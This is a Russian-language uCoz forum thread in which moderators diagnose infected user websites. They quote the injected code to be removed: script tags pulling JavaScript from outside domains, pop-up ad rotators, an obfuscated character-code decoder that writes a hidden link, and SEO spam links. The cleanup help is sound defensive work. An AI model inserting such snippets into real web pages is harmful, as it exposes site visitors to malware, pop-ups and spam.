Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
VAAADIM, из информера посетители за сегодня удалите следующий код
Quote <script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script> он у вас повторяется два раза и оба заражены в мини чате в виде материалов повторяется слишком много раз (равное количеству сообщений) битый код Code http://sinners.pp.ua/SINNERS/1/js/mchat.js этот тоже битый Code http://smfile.3dn.ru/grafo.js этот тоже битый Code http://newwolves.ru/jquery1.tooltip.js не подгружайте скрипты и картинки со сторонних сайтов |
|
Здравствуйте!
Проверте пожалуйста мой сайт: http://dnepr-klas.at.ua Постояна выбрасует, и меняется ссылка на : http://dnepr-klas.at.ua/?lrxNO7 Нажемаю вход в Админ панель, ссылка как обычно: http://dnepr-klas.at.ua/admin/ Вожу Код безопасности, пишет неправильный код, и меняется ссылка на: http://dnepr-klas.at.ua/admin/7 Код безопасности вобще некак не введеш, постояна пишет, неправильный код безопасности! Можете ево проверить на вредоносный код! Оформление подписи нарушает правила форума Сообщества uCoz. Подробнее. / webanet.
|
|
Alekseenko,
Quote Постояна выбрасует, и меняется ссылка на : http://dnepr-klas.at.ua/?lrxNO7 Нажемаю вход в Админ панель, ссылка как обычно: http://dnepr-klas.at.ua/admin/ Quote Код безопасности вобще некак не введеш, постояна пишет, неправильный код безопасности! под гостем сайт чистый. единственное что вам надо перебрать вот этот информер http://dnepr-klas.at.ua/informer/2 и перезалить все картинки к себе на сайт |
|
http://reevera.ru/
Вы должны дать описание проблемы: У некоторых друзей при заходе на сайт антивирус не пускает , пишет что обнаружена угроза , я проверил вот этой программой McAfee SiteAdvisor вот что она написала (В ходе анализа веб-репутации McAfee TrustedSource на этом сайте обнаружены потенциальные угрозы безопасности. Соблюдайте крайнюю осторожность.) , прочитал инструкцию что нада сделать что бы небыло выруса и исправил , но как ту зараза которая сидит вытащить ??? 1)Главная 2)Гости тоже . |
|
beeRox, ваша проблема вот из-за этого кода
Quote <!-- function Decode(){var temp="",i,c=0,out="";var str="60!99!101!110!116!101!114!62!60!97!32!104!114!101!102!61!34!104!116!116!112 !58!47!47!52!104!101!97!116!115!46!99!111!109!47!34!32!97!10 8!116!61!34!169!34!62!60!98!62!169!60!47!98!62!60!47!97!62!60!47!99!101!110!116!101!114!62!";l=str.length;while(c<=str.length-1){while(str.charAt©!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} //--> это что то типа или спама или такого агрессивного копирайта от 4heats.com но многие антивирусы и онлайн проверки реагируют на такие конструкции как на потенциально опасный код. нужно убрать и ваш байлинк не совсем то http://buy-link.ru/codes/link.php?id=3826 ссылка Code document.write("<a href='http://scripts-for-ucoz.ru/' target='_blank'>uCoz - скрипты, коды ....</a><br>"); document.write("<a href='http://cobra.lv' target='_blank'>Cobra Counter Strike 1.6</a><br>"); распаковка но это ваше дело чем мусорить на сайте. уберите закодированный код и проблема должна быть решена, во всяком случае с аллертами антивирусов |
|
mishka1978, http://mirmebeli.ucoz.ua/index/shkaf_kupe/0-21
Quote <p><a href="http://www.pharmacie-sartrouville.com">Cialis 20mg</a> ; Покажу родителям <a href="http://kyplu-diplom.com/" target="_blank">диплом о высшем образовании</a> . В Кировограде ; Дуже гарний унікальний <a href="http://zaklepochka.com.ua/index.php?option=com_content&view=article&id=50&Itemid=53" target="_blank">пошив одягу</a> в Києві в чудовому ательє Zaklepochka ; 旦那や奥さんと <a href="http://www.wakare-pro.com/wakare-rikon/" target="_blank">離婚したい</a> 悩み相談 ; <a href="http://www.mayertrade.com.ua">купить мебель</a> в Интернете</p> в общем на всех индексных страницах подобный спам в конце кода тела страницы присутствует. очистить все. страницу с баннерами удалить с индексный страниц удалить код от вебсерфа WebSurf и я бы вычистила футер от рейтингов и каталогов |
|
Мои сайты: http://griby.3dn.ru/ и http://zhivaja-voda.ucoz.ru/ проверял на
http://www.virustotal.com/index.html, было обнаружено: BitDefender Malware site. Как найти и збавиться от этого вируса? А, http://burbon.ru/service/virus.php также утверждает,что: возможно есть вредоносный код! Для http://griby.3dn.ru/ Яндекс время от времени сообщает, что обнаружен вредоносный код, а при повторных проверках - отсутствует. |
|
Добрый день! На днях появилось окно с рекламой и только на главной странице. Что под гостем, что под пользователем. В админке уже давно ничего не делал. Посмотрите пожалуйста
http://www.fcaktobe-fans.kz/ Сообщение отредактировал НеТормози - Воскресенье, 20 Ноя 2011, 15:49:59
|
|
НеТормози, перебирайте это
Quote <script language="javascript" src="http://uno.wb-rotator.com/?t=br&pid=30665"></script> <script language="javascript" src="http://uno.wb-rotator.com/?t=br&noadult=1&pid=30665"></script> <script language="javascript" src="http://uno.wb-rotator.net/?t=tl&pid=30665"></script> <script language="javascript" src="http://uno.wb-rotator.net/?t=cf&pid=30665"></script> <script language="javascript" src="http://uno.wt-rotator.info/?t=rot&noadult=1&pid=30665"></script> <script language="javascript" src="http://uno.wt-rotator.info/?t=popup&noadult=1&pid=30665"></script> <script language="javascript" src="http://uno.wt-rotator.info/?t=rot&noadult=1&pid=30665"></script> <script language="javascript" src="http://uno.wt-rotator.info/?t=popup&noadult=1&pid=30665"></script> вы ставили эту всю грязь к себе на сайт? |
|
defaultNick2216, по сайту http://griby.3dn.ru/
проблема тут Реклама от contextual.su и Реклама con-l иногда фонит то, что откручиваете этой рекламой, вот яндекс и банит когда фонит тоже самое и по второму сайту Реклама от contextual.su и con-l |
|
Всем доброго времени суток.
Помогите пожалуйста обнаружить вирус на сайте http://firemaster.ucoz.ru/ 1. Появлятся на любой из страниц сайта 2. Под гостем и пользователем. Каспер выдает следующее getanalyticsurl?sid=3530&mode=27 Запрещено: http://filezplanet.net/data/getanalyticsurl?sid=3530&mode=27 (проверка по базе фишинговых веб-адресов) 22.11.2011 1:02:43 Перелопатил весь код, так и не нашел. И еще одно - пропала подсветка синтаксиса в редакторе и при попытке изменить код(т.е. сохранить изменения) видает ошибку 414 Request-URI Too Large, то есть другими словами даже если бы и нашел заразу, то удалить её не смог |
|
Motrexa, в друзьях сайта находится
Quote <a href="http://uweb.su/" title="Бесплатная раскрутка сайтов от uweb." id="81660"><img src="http://uweb.su/data/files/banner2.png" alt="uweb" /></a> <script type="text/javascript" src="http://uweb.su/data/files/uweb.js"></script> <br><a href="http://warezmix.ru" title="Лучший варез портал для Вас"><img src="http://warezmix.ru/uploads/Banner_88x31.gif" alt="Лучший варез портал для Вас" border="0" width="88" height="31" /></a><!-- </bc> --></td></tr> </table></td></tr> выделенное красным и есть источник ваших проблем вы ещё чужую рекламу откручиваете и называется это у вас раскруткой? |
| |||